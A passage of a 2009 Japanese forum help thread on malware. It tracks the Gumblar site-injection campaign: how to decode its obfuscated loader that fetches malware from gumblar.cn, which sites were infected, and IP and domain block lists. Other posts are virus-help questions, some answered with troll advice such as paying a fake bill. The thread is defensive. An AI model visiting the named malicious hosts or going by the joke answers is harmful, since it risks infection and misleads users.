3) 置換後のテキストを、上記のサイトの右側の欄に貼り付け
4) unescape関数でデコード のボタンを押す
そうすると、左側に元のスクリプトが表示されます。今回のだと、前の方でOS判定をやって、
最後の所で src=//gumblar.cn/〜 でマルウェアを落とすようになっていることがわかるのです。
889 :名無しさん@お腹いっぱい。:2009/05/02(土) 23:43:45
idがJScriptエンジンのバージョンだって事は分かった。
ID付けてアクセスしたらスクリプトが落ちてきたよ。
ttp://www.virustotal.com/jp/analisis/e90aad75500f07482cb4ef925a55f9cc
ID付けてアクセスしたらスクリプトが落ちてきたよ。
ttp://www.virustotal.com/jp/analisis/e90aad75500f07482cb4ef925a55f9cc
890 : ◆N9P3SuvBPo :2009/05/03(日) 00:00:18
>888
やってみたところ、ちゃんとできました。
@のところを%に置き換える作業がめんどくさかったですけどね。
勉強になります…
やってみたところ、ちゃんとできました。
@のところを%に置き換える作業がめんどくさかったですけどね。
勉強になります…
891 :名無しさん@お腹いっぱい。:2009/05/03(日) 08:07:57
892 :名無しさん@お腹いっぱい。:2009/05/03(日) 08:17:59
事後情報です。
検出可否スレにも書きましたが、gumblar.cnが、Googleの攻撃サイトに登録されました。
GoogleのSafe Browsing APIを使用しているブラウザ(Firefoxやchromeなど)では、アクセスブロック(攻撃サイトの表示)が行われるようになっています。
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/
2009年5月3日 10:20時点で、既に308個のドメインを感染させているそうですので、皆様も注意お願いします。
検出可否スレにも書きましたが、gumblar.cnが、Googleの攻撃サイトに登録されました。
GoogleのSafe Browsing APIを使用しているブラウザ(Firefoxやchromeなど)では、アクセスブロック(攻撃サイトの表示)が行われるようになっています。
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/
2009年5月3日 10:20時点で、既に308個のドメインを感染させているそうですので、皆様も注意お願いします。
894 :名無しさん@お腹いっぱい。:2009/05/03(日) 11:00:37
乙。
ライセンスの電話認証めんどくさ。
ライセンスの電話認証めんどくさ。
895 :名無しさん@お腹いっぱい。:2009/05/03(日) 12:31:38
Firefoxで踏んでみたけど、今んとこ問題ない
896 :名無しさん@お腹いっぱい。:2009/05/03(日) 12:34:51
危険IPのブロック(Firewall登録/IPベースのブロッカーの導入)
IDS/IPS/Firewall
BLOCK : 94.229.65.160 - 94.229.65.191
めんどくさいんで、まとめてブロック
BLOCK : 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
Browser/Hosts ブロック:
BLOCK : gumblar.cn
IDS/IPS/Firewall
BLOCK : 94.229.65.160 - 94.229.65.191
めんどくさいんで、まとめてブロック
BLOCK : 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
Browser/Hosts ブロック:
BLOCK : gumblar.cn
897 :名無しさん@お腹いっぱい。:2009/05/03(日) 15:03:06
ありがとう。
うちのルータのIPフィルタはマスク長入れないといけないので
まとめてブロックは初心者としては有難いです。
うちのルータのIPフィルタはマスク長入れないといけないので
まとめてブロックは初心者としては有難いです。
898 :名無しさん@お腹いっぱい。:2009/05/04(月) 00:33:02
899 :名無しさん@お腹いっぱい。:2009/05/04(月) 00:44:46
900 :名無しさん@お腹いっぱい。:2009/05/04(月) 00:49:00
>>899
サンクス
サンクス
901 :名無しさん@お腹いっぱい。:2009/05/04(月) 02:36:25
>>878,898
gumblar.cnの感染サイト追加。http://pc11.2ch.net/test/read.cgi/sec/1129098218/300 より転載
ttp://www●nenrei-hayami●net/
や、これはキリがないな。時間と共に増える一方だ。ちょうど連休中で管理者不在のサイトも多そうだし。
つか、genoの時も思ったけど、こいつら簡単に改竄されすぎじゃねえのかと...
gumblar.cnの感染サイト追加。http://pc11.2ch.net/test/read.cgi/sec/1129098218/300 より転載
ttp://www●nenrei-hayami●net/
や、これはキリがないな。時間と共に増える一方だ。ちょうど連休中で管理者不在のサイトも多そうだし。
つか、genoの時も思ったけど、こいつら簡単に改竄されすぎじゃねえのかと...
902 :名無しさん@お腹いっぱい。:2009/05/04(月) 06:05:12
せっかくの休日をウィルスでやられたんじゃたまったもんじゃないな
903 :名無しさん@お腹いっぱい。:2009/05/04(月) 10:48:58
危険IPのブロック(Firewall登録/IPベースのブロッカーの導入)
現在のまとめ: 2009.05.03 予防措置も含めて
Host Flesh
58.65.232.0 - 58.65.239.255
Chunghwa Telecom Co.
61.219.39.0 - 61.219.39.255
CHINA RAILWAY TELECOMMUNICATIONS CENTER
61.235.117.0 - 61.235.117.255
61.237.236.0 - 61.237.236.255
XS4ALL Internet BV (zief.pl)
83.68.16.0 - 83.68.16.255
UK Dedicated Servers Limited
- (gumblar -- Russian )
94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
ZLKON
94.247.2.0 - 94.247.3.255
CHINA UNICOM
211.90.0.0 - 211.97.255.255
LU-ROOT
212.117.160.0 - 212.117.191.255
CHINANET
218.90.0.0 - 218.94.255.255
現在のまとめ: 2009.05.03 予防措置も含めて
Host Flesh
58.65.232.0 - 58.65.239.255
Chunghwa Telecom Co.
61.219.39.0 - 61.219.39.255
CHINA RAILWAY TELECOMMUNICATIONS CENTER
61.235.117.0 - 61.235.117.255
61.237.236.0 - 61.237.236.255
XS4ALL Internet BV (zief.pl)
83.68.16.0 - 83.68.16.255
UK Dedicated Servers Limited
- (gumblar -- Russian )
94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
ZLKON
94.247.2.0 - 94.247.3.255
CHINA UNICOM
211.90.0.0 - 211.97.255.255
LU-ROOT
212.117.160.0 - 212.117.191.255
CHINANET
218.90.0.0 - 218.94.255.255
904 :名無しさん@お腹いっぱい。:2009/05/05(火) 01:05:12
http://ssupdater.com/modules/Forums/index.php?showtopic=2502
http://ssupdater.com/modules/Forums/index.php?showtopic=1810
http://ssupdater.com/modules/Forums/index.php?showtopic=3746
http://ssupdater.com/modules/Forums/index.php?showtopic=1810
http://ssupdater.com/modules/Forums/index.php?showtopic=3746
905 : ◆N9P3SuvBPo :2009/05/05(火) 01:21:04
>904
海外のアンチウイルスやアンチスパイウェアの検出ランキングです。
古いです。
海外のアンチウイルスやアンチスパイウェアの検出ランキングです。
古いです。
906 :名無しさん@お腹いっぱい。:2009/05/05(火) 06:14:46
すみません、質問です。
Symantec Security Checkを通したら
C:\WINDOWS\system32\Tools\Hide.exe は Adware.Gen に感染していると言われました。
これはどうすればいいでしょうか?
Symantec Security Checkを通したら
C:\WINDOWS\system32\Tools\Hide.exe は Adware.Gen に感染していると言われました。
これはどうすればいいでしょうか?
907 :名無しさん@お腹いっぱい。:2009/05/05(火) 07:44:51
マジレスですご返答お願いします。
アダルトサイトからの請求画面がパソコン上に出ます。消してもしつこく出てきます。
間違いなく架空請求です。何か止める方法はありますか?
宜しくお願いします。
アダルトサイトからの請求画面がパソコン上に出ます。消してもしつこく出てきます。
間違いなく架空請求です。何か止める方法はありますか?
宜しくお願いします。
908 :名無しさん@お腹いっぱい。:2009/05/05(火) 07:52:14
請求どおり払う。
909 :名無しさん@お腹いっぱい。:2009/05/05(火) 10:31:14
・SUPERAntiSpywareやmalwarebytes' anti-malwareを試してみる。
・OSクリーンインストール。
・窓からPCを投げる
・OSクリーンインストール。
・窓からPCを投げる
910 :名無しさん@お腹いっぱい。:2009/05/05(火) 11:36:27
909さんはじめまして907です
手順を追って丁寧に教えてほしいです
お願いします
手順を追って丁寧に教えてほしいです
お願いします
911 :名無しさん@お腹いっぱい。:2009/05/05(火) 12:15:35
まずPCをシャットダウンします。
シャットダウンが完了したら、接続されている線を全て抜きます。
全て抜き終わったら窓を開け、下に人が居ないのを確認したら窓から勢いよく放り投げるます。
PCが落ちたのを確認したら近くの家電量販店に行き、適当なPCを買ってきます。
これで元通りになると思います。
シャットダウンが完了したら、接続されている線を全て抜きます。
全て抜き終わったら窓を開け、下に人が居ないのを確認したら窓から勢いよく放り投げるます。
PCが落ちたのを確認したら近くの家電量販店に行き、適当なPCを買ってきます。
これで元通りになると思います。
912 :名無しさん@お腹いっぱい。:2009/05/05(火) 21:24:30
explzを本サイトで落そうとして、ダウンロードをクリックしたら、アンチウィルスソフトがブロックした。
ウィルス入ってるのかなぁ。。。
ウィルス入ってるのかなぁ。。。
913 :名無しさん@お腹いっぱい。:2009/05/05(火) 22:09:44
>>912
DECLHA.EXEが誤検出されるけど無害
DECLHA.EXEが誤検出されるけど無害
914 :名無しさん@お腹いっぱい。:2009/05/05(火) 22:56:47
>>913
何が誤検出されてるか調べるのは、どうすればわかるの?
何が誤検出されてるか調べるのは、どうすればわかるの?
915 :名無しさん@お腹いっぱい。:2009/05/05(火) 23:05:09
お使いのアンチウイルスソフトのスレで聞いてください
916 :名無しさん@お腹いっぱい。:2009/05/06(水) 06:32:54
>>905
新しいのください
新しいのください
917 :名無しさん@お腹いっぱい。:2009/05/06(水) 11:21:39
918 :名無しさん@お腹いっぱい。:2009/05/06(水) 11:42:08
>>917
見てみましたが、その通りです。
そのページの中にあるswfobject.jsとimageReplace.jsの2つのファイルの中に、gumblar.cnへのリンクが埋め込まれています。
つーか、まだgumblar拡散してんのか...流石GW中、どこも管理者不在かねぇ。 ある意味明日が楽しみだな。
見てみましたが、その通りです。
そのページの中にあるswfobject.jsとimageReplace.jsの2つのファイルの中に、gumblar.cnへのリンクが埋め込まれています。
つーか、まだgumblar拡散してんのか...流石GW中、どこも管理者不在かねぇ。 ある意味明日が楽しみだな。
919 : ◆N9P3SuvBPo :2009/05/06(水) 11:46:20
>916
それは904に聞いてください。
>917
そのサイトのトップのソースをまるまるvirustotalに掛けて見たんですけど、
ひとつも検出できたソフトはありませんでした。
ちなみにそのサイトのどこでAvastが反応ありましたか?
それは904に聞いてください。
>917
そのサイトのトップのソースをまるまるvirustotalに掛けて見たんですけど、
ひとつも検出できたソフトはありませんでした。
ちなみにそのサイトのどこでAvastが反応ありましたか?
>>919
>918の通り、そのページのソースそのものではなく、呼び出しているスクリプトファイルの中に埋め込まれています。
swfobject.jsとimageReplace.jsの2つをテキストエディタで開けば、毎度おなじみの難読化コードが出てきますよ。
>918の通り、そのページのソースそのものではなく、呼び出しているスクリプトファイルの中に埋め込まれています。
swfobject.jsとimageReplace.jsの2つをテキストエディタで開けば、毎度おなじみの難読化コードが出てきますよ。
921 : ◆N9P3SuvBPo :2009/05/06(水) 11:55:38
>918
>920
どおりでトップページに無いわけでした。
/imageReplace.jsや/swfobject.jsのソースを確認したところ、
問題のコードが下の部分にありました。
917すいません…
>920
どおりでトップページに無いわけでした。
/imageReplace.jsや/swfobject.jsのソースを確認したところ、
問題のコードが下の部分にありました。
917すいません…
922 :名無しさん@お腹いっぱい。:2009/05/06(水) 12:40:17
>>918
ありがとうございます
TOPページのソースを見てもちょっとわからなかったので納得です
普通の人は閲覧しないであろうサイトですが
ポイントサイトにリンクがあったので見ちゃった人多いかも…
>>921
いえいえ
ありがとうございます
TOPページのソースを見てもちょっとわからなかったので納得です
普通の人は閲覧しないであろうサイトですが
ポイントサイトにリンクがあったので見ちゃった人多いかも…
>>921
いえいえ
923 :名無しさん@お腹いっぱい。:2009/05/08(金) 20:53:36
どっかに、沢山ウィルスが置いてあるサイトってない?
924 :名無しさん@お腹いっぱい。:2009/05/08(金) 22:28:53
>>923
eicarでも使っとけカス
eicarでも使っとけカス
925 :名無しさん@お腹いっぱい。:2009/05/10(日) 02:34:38
緊急の対処法を教えてください。
昨日から今日にかけて、大量のMAILER_DAEMONを受信しました。
所有する独自ドメインで管理しているしているメールアドレスからどうやら発信しているようです。
[email protected]
このxxxの部分が自分の管理していない見覚えのないアカウントになっています。
まだウイルスかは分からないですが、とりあえず緊急処置を教えていただけませんか?
スレチだったらごめんなさい。
昨日から今日にかけて、大量のMAILER_DAEMONを受信しました。
所有する独自ドメインで管理しているしているメールアドレスからどうやら発信しているようです。
[email protected]
このxxxの部分が自分の管理していない見覚えのないアカウントになっています。
まだウイルスかは分からないですが、とりあえず緊急処置を教えていただけませんか?
スレチだったらごめんなさい。
926 :名無しさん@お腹いっぱい。:2009/05/10(日) 03:23:03
一瞬、冷や汗がでましたが自己解決できました。
メールヘッダを調べたことろ、誰かが自分のアドレスを偽装して送信していたみたいです。
板汚してすいません。
メールヘッダを調べたことろ、誰かが自分のアドレスを偽装して送信していたみたいです。
板汚してすいません。
927 :名無しさん@お腹いっぱい。:2009/05/10(日) 12:21:35
こんな程度の奴がドメイン持つなよ…
928 :名無しさん@お腹いっぱい。:2009/05/11(月) 10:17:37
929 :名無しさん@お腹いっぱい。:2009/05/13(水) 22:19:53
すいません、なんちゃってネットワーク管理者です。
社内のパソコンでウィルスが発生しました。
【使用セキュリティソフトとバージョン】「ウィルスバスター2007、2008、2009」
【Microsoft Update(MU)の状態】 「今年の4月までの状態でした」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】「Yes」
ウィルスバスターが「BKDR_SDBOT.CU」を検出、隔離したとメッセージが出ていて、ウィルスが感染
していたであろうUSBメモリも検索し隔離、その後フォーマットもしたのですが、違うPCで
利用したところ、そのPCのウィルスバスターもUSBメモリにウィルスが存在しているというメッセージを
出してしまいました。
どうしたら完全に削除することができるのでしょうか。
社内のパソコンでウィルスが発生しました。
【使用セキュリティソフトとバージョン】「ウィルスバスター2007、2008、2009」
【Microsoft Update(MU)の状態】 「今年の4月までの状態でした」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】「Yes」
ウィルスバスターが「BKDR_SDBOT.CU」を検出、隔離したとメッセージが出ていて、ウィルスが感染
していたであろうUSBメモリも検索し隔離、その後フォーマットもしたのですが、違うPCで
利用したところ、そのPCのウィルスバスターもUSBメモリにウィルスが存在しているというメッセージを
出してしまいました。
どうしたら完全に削除することができるのでしょうか。
930 :名無しさん@お腹いっぱい。:2009/05/13(水) 22:54:02
そのUSBメモリ捨てて新しいの買えよ
931 :名無しさん@お腹いっぱい。:2009/05/14(木) 13:27:16
>>929
autorunを切れ
http://www.itmedia.co.jp/enterprise/articles/0902/26/news029.html
http://support.microsoft.com/kb/967715/ja
autorunを切れ
http://www.itmedia.co.jp/enterprise/articles/0902/26/news029.html
http://support.microsoft.com/kb/967715/ja
932 :名無しさん@お腹いっぱい。:2009/05/14(木) 13:35:50
最近GENOウィルスの存在を知り、感染しているか心配です。
OSはVISTAを使っていて、まとめサイトではVISTAは大丈夫と記載はありますが、、、
VISTA感染の報告などあるのでしょうか?
OSはVISTAを使っていて、まとめサイトではVISTAは大丈夫と記載はありますが、、、
VISTA感染の報告などあるのでしょうか?
933 :名無しさん@お腹いっぱい。:2009/05/14(木) 20:33:03
スクリプトでNT5(2000、XP、2003)以外を蹴ってるが、
わざわざスクリプト解読してpdfやswfやexeを拾って実行すりゃ感染するんじゃね?
わざわざスクリプト解読してpdfやswfやexeを拾って実行すりゃ感染するんじゃね?
934 :名無しさん@お腹いっぱい。:2009/05/14(木) 21:59:30
小林製薬の一部サイトが改ざん、閲覧者はウイルス感染の恐れ
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html
935 :名無しさん@お腹いっぱい。:2009/05/16(土) 00:04:21
AVGで次のメッセージが出ました。
「Adware.CnsMinが検出されました」
どうすれば良いのでしょうか?
「Adware.CnsMinが検出されました」
どうすれば良いのでしょうか?
936 :名無しさん@お腹いっぱい。:2009/05/16(土) 00:05:43
AVG Anti-Virus Version 86
http://pc11.2ch.net/test/read.cgi/sec/1240905473/
http://pc11.2ch.net/test/read.cgi/sec/1240905473/
937 :名無しさん@お腹いっぱい。:2009/05/18(月) 23:42:49
携帯電話からサイトを観覧した場合でも、やっぱり感染してしまうんでしょうか?
938 :名無しさん@お腹いっぱい。:2009/05/19(火) 00:58:53
>>937
観覧ねwww
観覧ねwww
939 :名無しさん@お腹いっぱい。:2009/05/19(火) 10:11:29
>>938
陛下に対してなんという口のききかた…
陛下に対してなんという口のききかた…
940 :名無しさん@お腹いっぱい。:2009/05/20(水) 10:45:19
データを移すとき、USBメモリや外付けHDDなどで
ウィルスに感染するそうですね。
では、DVD−Rを使ってデータを移しても、
やっぱり感染のリスクはあるのでしょうか?
ウィルスに感染するそうですね。
では、DVD−Rを使ってデータを移しても、
やっぱり感染のリスクはあるのでしょうか?
941 :名無しさん@お腹いっぱい。:2009/05/20(水) 13:33:07
【使用OS】 「vista home premium sp1」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「常に最新」
【スパイウェア対策ソフト】 「カスペルスキー2009しか入れていません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常に最新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「HEUR:Trojan-Downloader.Script.Generic
Windows Sidebar\Shared Gadgets\eBooks World.gadget\filpBook.js」
(半角が見当たらないので全角になってしまいました。すみません)
ウイルスに分類されており、駆除出来なかったのでファイルごと削除して再起動かけました
このウイルスについてググったところ海外サイトばかりひっかかり、
詳細が分からないので教えて下さい
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「常に最新」
【スパイウェア対策ソフト】 「カスペルスキー2009しか入れていません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常に最新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「HEUR:Trojan-Downloader.Script.Generic
Windows Sidebar\Shared Gadgets\eBooks World.gadget\filpBook.js」
(半角が見当たらないので全角になってしまいました。すみません)
ウイルスに分類されており、駆除出来なかったのでファイルごと削除して再起動かけました
このウイルスについてググったところ海外サイトばかりひっかかり、
詳細が分からないので教えて下さい
942 :名無しさん@お腹いっぱい。:2009/05/21(木) 09:33:15
サーバーのファイルに作った覚えのない
「hili2.php」ってのが作られてhtmlも改ざんされてるんだけど
詳細わかる人います?
「hili2.php」ってのが作られてhtmlも改ざんされてるんだけど
詳細わかる人います?
943 :名無しさん@お腹いっぱい。:2009/05/21(木) 09:48:16
「hifili2.php」だった
944 :名無しさん@お腹いっぱい。:2009/05/21(木) 11:06:15
945 :名無しさん@お腹いっぱい。:2009/05/22(金) 22:05:46
hj-splitという動画ファイルを結合させるソフトをいつものように立ち上げましたところ
このようなメッセージが出まして立ち上がりませんでした。
the procedure entry point ioctlsocket could not be located in the dynamic link library wsock32.dll
ウィルスなのでしょうか?対策方法などわかりましたら、ご指導ください。
このようなメッセージが出まして立ち上がりませんでした。
the procedure entry point ioctlsocket could not be located in the dynamic link library wsock32.dll
ウィルスなのでしょうか?対策方法などわかりましたら、ご指導ください。
946 :名無しさん@お腹いっぱい。:2009/05/23(土) 12:11:54
192.***.***.255はブロードキャストアドレスですよね?(192.***.***.1がルータのアドレス)
セキュリティソフトが接続先192.***.***.255、UDPポート138の通信を許可するのか聞いてきますが、
許可で問題ありませんよね?
セキュリティソフトが接続先192.***.***.255、UDPポート138の通信を許可するのか聞いてきますが、
許可で問題ありませんよね?
947 :名無しさん@お腹いっぱい。:2009/05/24(日) 12:37:35
SMVERI32.dll っていうウイルスなのかよく分からないものに感染した。。
SMCORPNAME Corporation
って書いてあるが中国?のやつかもしれないが
このファイルがwuaulctやrundll32を頻繁に起動させて困っています
どなたかご存知の方がいらっしゃいましたら
対処法を教えてください
お願いします
SMCORPNAME Corporation
って書いてあるが中国?のやつかもしれないが
このファイルがwuaulctやrundll32を頻繁に起動させて困っています
どなたかご存知の方がいらっしゃいましたら
対処法を教えてください
お願いします
948 :名無しさん@お腹いっぱい。:2009/05/24(日) 13:35:44
なんで質問テンプレすら使えない奴ばっかりなんだろう。
949 :名無しさん@お腹いっぱい。:2009/05/24(日) 14:25:00
質問用テンプレが回答者に一方的に都合が良くて質問者向けで無いからだろう
質問用テンプレを自分で全部埋められる人がここで聞く事なんか無いだろうさ
質問用テンプレを自分で全部埋められる人がここで聞く事なんか無いだろうさ
950 :名無しさん@お腹いっぱい。:2009/05/24(日) 14:46:37
951 :名無しさん@お腹いっぱい。:2009/05/24(日) 15:04:41
記載例は必要だぞ。
952 :名無しさん@お腹いっぱい。:2009/05/24(日) 15:32:27
953 :名無しさん@お腹いっぱい。:2009/05/24(日) 15:56:14
開き直りか
もう回答は無いと思え
もう回答は無いと思え
954 :名無しさん@お腹いっぱい。:2009/05/24(日) 16:37:09
955 : ◆N9P3SuvBPo :2009/05/24(日) 18:04:33
原因分かってるのならご自身で対処できると思いますが…?
956 :名無しさん@お腹いっぱい。:2009/05/25(月) 08:46:07
★質問用テンプレ★
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「最新です」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「ありません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ありません」
【ルータの有無】 「あります」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
リカバリをした後Janeをダウンロードしようと思って
http://janesoft.net/janestyle/(Jane公式サイトです)へアクセスし、
ZIP版をダウンロードしたらノートンがトロイのウイルス警告を出しました、詳細は
http://safeweb.norton.com/report/show?url=ftp.vector.co.jpです。
ZIP版をダウンロードはしたのですが、解凍はしていないのと、ノートンで
フルスキャンをしても何も検出されませんでした。
警告を出されただけで、解凍していない&スキャンで何も検出されなかったら
問題は無いでしょうか?
よろしくお願いします。
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「最新です」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「ありません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ありません」
【ルータの有無】 「あります」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
リカバリをした後Janeをダウンロードしようと思って
http://janesoft.net/janestyle/(Jane公式サイトです)へアクセスし、
ZIP版をダウンロードしたらノートンがトロイのウイルス警告を出しました、詳細は
http://safeweb.norton.com/report/show?url=ftp.vector.co.jpです。
ZIP版をダウンロードはしたのですが、解凍はしていないのと、ノートンで
フルスキャンをしても何も検出されませんでした。
警告を出されただけで、解凍していない&スキャンで何も検出されなかったら
問題は無いでしょうか?
よろしくお願いします。
957 :名無しさん@お腹いっぱい。:2009/05/25(月) 14:06:08
Nortonスレで聞けよ
958 :名無しさん@お腹いっぱい。:2009/05/25(月) 19:30:28
【使用OS】Windows Vista SP1
【Microsoft Update(MU)の状態】最新の状態
【使用セキュリティソフトとバージョン】ウイルスキラーゼロ(2009年版に更新済み)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Backdoor.Win32.VB.epoという名前のウイルスが起動後に数分おきに常に駆除されています。
完全にウイルススキャンを行っても感染ファイルは発見されず、安全性のチェックをしても高いままです。
どうやら駆除しきれていないようなので、このままパソコンを使い続けるのは危険なように感じます。
完全に駆除するにはどうしたらよいのでしょうか?
よろしくお願いします。
【Microsoft Update(MU)の状態】最新の状態
【使用セキュリティソフトとバージョン】ウイルスキラーゼロ(2009年版に更新済み)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Backdoor.Win32.VB.epoという名前のウイルスが起動後に数分おきに常に駆除されています。
完全にウイルススキャンを行っても感染ファイルは発見されず、安全性のチェックをしても高いままです。
どうやら駆除しきれていないようなので、このままパソコンを使い続けるのは危険なように感じます。
完全に駆除するにはどうしたらよいのでしょうか?
よろしくお願いします。
959 :名無しさん@お腹いっぱい。:2009/05/25(月) 20:29:25
>>958
クリンインスコしる
クリンインスコしる
960 :名無しさん@お腹いっぱい。:2009/05/25(月) 21:01:34
>>959
繰り返し質問ですみません。
クリーンインストールって、Vistaを再インストールするってことですか?
それとBackdoor.Win32.VB.epoはどんな悪影響を及ぼすウイルスなのでしょうか?
ググってみてもまともな解説のあるサイトをほとんど発見できなかったのですが…。
繰り返し質問ですみません。
クリーンインストールって、Vistaを再インストールするってことですか?
それとBackdoor.Win32.VB.epoはどんな悪影響を及ぼすウイルスなのでしょうか?
ググってみてもまともな解説のあるサイトをほとんど発見できなかったのですが…。
>>960
カスペのオンラインで駆除出来ると思うが万全を期すんだったら再インストール
カスペのオンラインで駆除出来ると思うが万全を期すんだったら再インストール
962 :名無しさん@お腹いっぱい。:2009/05/25(月) 21:34:13
>>960
だーかーらー
ウジウジ悩むくらいなら綺麗さっぱり消しちまえ
ついでにうぃるすきらぁも投げ捨てて別なワクチンを導入しろ
間違ってもキングとかセキュリティZEROみたいなジョークソフトを入れるなよ
だーかーらー
ウジウジ悩むくらいなら綺麗さっぱり消しちまえ
ついでにうぃるすきらぁも投げ捨てて別なワクチンを導入しろ
間違ってもキングとかセキュリティZEROみたいなジョークソフトを入れるなよ
963 :名無しさん@お腹いっぱい。:2009/05/25(月) 21:35:35
>>960
キラーのスレでも同じようなこと言ってる人いたからキラーの問題じゃないか?
キラーのスレでも同じようなこと言ってる人いたからキラーの問題じゃないか?
964 :名無しさん@お腹いっぱい。:2009/05/25(月) 21:45:10
>>961-962
ありがとうございます。
まずはカスペにアクセスして駆除を試してみます。
駄目なら大事なデータを避難して再インストールします。
>>963
多分それは私だと思います。レスがつかなかったのでスレチかと思って…。
結果的にはマルチになってしまいましたね、すみません…。
ありがとうございます。
まずはカスペにアクセスして駆除を試してみます。
駄目なら大事なデータを避難して再インストールします。
>>963
多分それは私だと思います。レスがつかなかったのでスレチかと思って…。
結果的にはマルチになってしまいましたね、すみません…。
965 :名無しさん@お腹いっぱい。:2009/05/25(月) 22:30:08
まさかシステムの復元のバックアップフォルダってオチじゃないよな
966 :名無しさん@お腹いっぱい。:2009/05/27(水) 17:31:38
C:\Documents and Settings\(ユーザー名)の中に「CHIAKO」というフォルダが出来ていました。
フォルダの中には「新しいフォルダ(8)」が入っていて、その中には何もありませんでした
プロパティで確認したところ0メガバイトでした。
自分家族はもちろんのこと知人にもCHIKAKOという名の人はいないのですが
勝手にこんなフォルダを作成するウイルスってあるのでしょうか?
フォルダの中には「新しいフォルダ(8)」が入っていて、その中には何もありませんでした
プロパティで確認したところ0メガバイトでした。
自分家族はもちろんのこと知人にもCHIKAKOという名の人はいないのですが
勝手にこんなフォルダを作成するウイルスってあるのでしょうか?
967 :名無しさん@お腹いっぱい。:2009/05/28(木) 06:53:26
>>966
誰かがその名前でPC使ったんじゃね?
誰かがその名前でPC使ったんじゃね?
968 :名無しさん@お腹いっぱい。:2009/05/29(金) 23:34:03
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybotとブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「場所:C:\ProgramData\Skype\Plugins\_sstore.dat
ウィルス名:SVL 1.X (Slovakia)
スカイプはいつもオンにしていて特に変わった作業をしたわけではありませんが、
いきなりavast!の警告が出ました。
avast!のスキャンを実行していたわけでもありません。
このウィルス警告が出たので、avastの警告画面の削除ボタンを押しました。
このウィルスは何ですか?なに経由できたんでしょうか?」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybotとブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「場所:C:\ProgramData\Skype\Plugins\_sstore.dat
ウィルス名:SVL 1.X (Slovakia)
スカイプはいつもオンにしていて特に変わった作業をしたわけではありませんが、
いきなりavast!の警告が出ました。
avast!のスキャンを実行していたわけでもありません。
このウィルス警告が出たので、avastの警告画面の削除ボタンを押しました。
このウィルスは何ですか?なに経由できたんでしょうか?」
969 :名無しさん@お腹いっぱい。:2009/05/30(土) 20:04:10
maruti
970 :名無しさん@お腹いっぱい。:2009/06/01(月) 00:18:38
昨日、中国の動画サイトで映画ナルト疾風伝・絆があったのでダウンロードしたのですが
ダウンロード終わったとほぼ同時に、いきなり強制終了したかのように確認ウィンドウもなしに電源が切れ、
すぐに電源ボタン押しても全く反応せず、
数分後に再び電源ボタン押すと数秒だけ起動しただけで、またシャットダウンしました
今も起動出来ません
この症状を質問スレで書いて聞いてみたら
「おそらく出力が安定していない。電源ユニットが逝ったと思われる。交換しよう」と、回答が返ってきたのですが
ウィルスでこのような症状に陥ることはないのでしょうか?
ダウンロード終わったとほぼ同時に、いきなり強制終了したかのように確認ウィンドウもなしに電源が切れ、
すぐに電源ボタン押しても全く反応せず、
数分後に再び電源ボタン押すと数秒だけ起動しただけで、またシャットダウンしました
今も起動出来ません
この症状を質問スレで書いて聞いてみたら
「おそらく出力が安定していない。電源ユニットが逝ったと思われる。交換しよう」と、回答が返ってきたのですが
ウィルスでこのような症状に陥ることはないのでしょうか?
